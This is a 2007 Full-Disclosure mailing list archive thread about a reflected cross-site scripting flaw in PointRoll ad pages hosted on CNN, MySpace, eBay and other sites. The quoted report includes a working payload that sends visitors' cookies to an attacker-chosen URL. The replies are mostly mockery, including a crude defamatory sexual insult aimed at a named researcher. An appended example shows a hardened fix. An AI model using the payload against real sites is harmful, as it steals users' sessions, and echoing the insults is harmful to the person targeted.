Full Disclosure mailing list archives
Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc
From: lulzlulzluzluz <hardened.php () gmail com>
Date: Sat, 20 Oct 2007 01:46:16 -0400
i hurd pdp likes animal porn, is this true? pdp can you give us a detailed write up of where you find your animal porn? along with xss 0dayz in every link?

On 10/19/07, phioust <phioust () gmail com> wrote:
> in order for this severe vulnerability to get the attention it deserves it should have first been given to pdp architect so that he could whore it up to the media and do many interviews and pdfs on it.
>
> http://www.theinquirer.net/gb/inquirer/news/2007/10/10/bt-home-hub-wide-open
> http://www.gnucitizen.org/about/pdp#comment-59109
> http://securityreason.com/securityalert/3213
> http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=22351&mode=thread&order=0&thold=0
>
> pdp architect could have also given great technical insight into the vulnerability due to his years spent researching XSS.
>
> http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0091.html <- a very technical email by pdp
>
> Results *1* - *10* of about *59,000* for *pdp architect xss*. (*0.12* seconds)
> ^ a great way to make a security career if stack based overflows are too challenging for you
>
> On 10/18/07, jgffgjfgd rewrewrew <ctjsme () gmail com> wrote:
>> A cross-site scripting vulnerability has been discovered on multiple websites which use ads provided by Pointroll. The following list is a subset of the websites which contain the vulnerability:
>>
>> http://www.cnn.com/pointroll/PointRollAds.htm
>> http://www.myspace.com/pointroll/PointRollAds.htm
>> http://www.friendster.com/pointroll/PointRollAds.htm
>> http://archive.gamespy.com/pointroll/PointRollAds.htm
>> http://www.monster.com/pointroll/PointRollAds.htm
>> http://www.allmusic.com/pointroll/PointRollAds.htm
>> http://www.pcworld.com/pointroll/PointRollAds.htm
>> http://www.10best.com/pointroll/PointRollAds.htm
>> http://www.askmen.com/pointroll/PointRollAds.htm
>> http://pages.ebay.com/pointroll/PointRollAds.html
>>
>> The above pages include a script at pointroll.com which is the root of the vulnerability. The vulnerability arises from the use of location.search without sanitizing the query. The following is a proof of concept which works in Firefox. This should be placed onto the end of any of the above URLs, obviously. [URL] should be replaced by your website URL, such as http://www.foo.com/bar.php, and [LENGTH+1] should be the length of your website URL + 1.
>>
>> ?pub=[URL]?&redir=%27%3E%3Cscript%3Ewindow.location= location.search.substring(5,[LENGTH+1]).concat(document.cookie)%3C/script%3E&ad=g235e20051011164320

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
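The original report quoted in this message attributes the flaw to a script that uses location.search without sanitizing the query. The JavaScript below is an added example, not part of the thread and not PointRoll's script: it contrasts that pattern with a hardened handler for a `redir` parameter. The function names, the link markup, the fallback path and the sample query string are assumptions constructed for illustration.

```javascript
// Added example: hypothetical redirect-link helper, not PointRoll's actual code.
// Both functions return the markup a page would emit for a ?redir=... query.

// Vulnerable pattern: the decoded query value is concatenated into an attribute.
function renderUnsafe(search) {
  const redir = new URLSearchParams(search).get('redir') || '';
  return "<a href='" + redir + "'>Continue</a>";
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the characters that can terminate an attribute value or open a tag.
function escapeAttr(value) {
  return value.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: accept only absolute http(s) URLs, then escape the
// normalized URL for the attribute context it is written into.
function renderSafe(search, fallback = '/') {
  const redir = new URLSearchParams(search).get('redir') || '';
  let target = fallback;
  try {
    const url = new URL(redir);
    if (url.protocol === 'http:' || url.protocol === 'https:') {
      target = url.href;
    }
  } catch (_) {
    // Not an absolute URL (for example, a value starting with a quote):
    // keep the fallback instead of reflecting the input.
  }
  return "<a href='" + escapeAttr(target) + "'>Continue</a>";
}

// Constructed sample: a value that closes the attribute and adds a harmless element.
const SAMPLE = '?pub=x&redir=%27%3E%3Cb%3Einjected%3C/b%3E&ad=constructed';

console.log(renderUnsafe(SAMPLE)); // query value lands in the markup as HTML
console.log(renderSafe(SAMPLE));   // fallback link, nothing reflected
```

The same two steps apply wherever the value ends up: validate it against what the parameter is supposed to be, then encode it for the exact output context.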
Current thread:
- XSS vulnerabilities on eBay, MySpace, CNN.com, etc jgffgjfgd rewrewrew (Oct 19)
- Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc phioust (Oct 19)
- Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc lulzlulzluzluz (Oct 19)
- Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc phioust (Oct 19)